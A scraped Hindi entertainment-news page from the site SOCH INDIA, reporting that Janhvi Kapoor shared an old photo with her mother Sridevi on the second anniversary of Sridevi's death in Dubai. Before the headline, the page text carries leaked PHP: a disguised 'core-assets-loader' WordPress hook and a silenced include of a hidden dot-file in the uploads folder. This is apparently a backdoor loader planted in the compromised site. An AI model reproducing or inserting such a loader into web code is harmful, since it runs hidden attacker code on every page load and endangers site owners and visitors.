add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); श्रीदेवी की पुण्यतिथि पर जाह्नवी कपूर हुईं भावुक, ‘रूप की रानी’ ने भी सहा था ‘प्रेम’ का ये दर्द – SOCH INDIA
Menu

देश
श्रीदेवी की पुण्यतिथि पर जाह्नवी कपूर हुईं भावुक, ‘रूप की रानी’ ने भी सहा था ‘प्रेम’ का ये दर्द

nobanner

बॉलीवुड एक्ट्रेस श्रीदेवी (Sridevi) के निधन को आज 2 साल पूरे हो गए हैं. 2018 में दुबई के एक होटल में श्रीदेवी मृत पाई गई थीं. श्रीदेवी की दूसरी पुण्यतिथि पर बेटी जाह्नवी कपूर ने एक पुरानी तस्वीर इंस्टाग्राम पर शेयर की है. इसमें जाह्नवी कपूर अपनी मां श्रीदेवी के साथ सोफे पर लेटी हैं. इस तस्वीर को शेयर करते हुए जाह्नवी कपूर ने लिखा- हर दिन आपको याद करती हूं.

बता दें कि बॉलीवुड की नंबर-1 एक्ट्रेस रहीं 54 साल की श्रीदेवी की दुबई के एक होटल के बाथटब में दुर्घटनावश डूबने से मौत हो गई थी. बॉलीवुड की ‘चांदनी’ अपने फैंस की जिंदगी में अंधेरा करके हमेशा-हमेशा के लिए दूर चली गई थीं. उनकी दो बेटियां हैं- जाह्नवी और खुशी.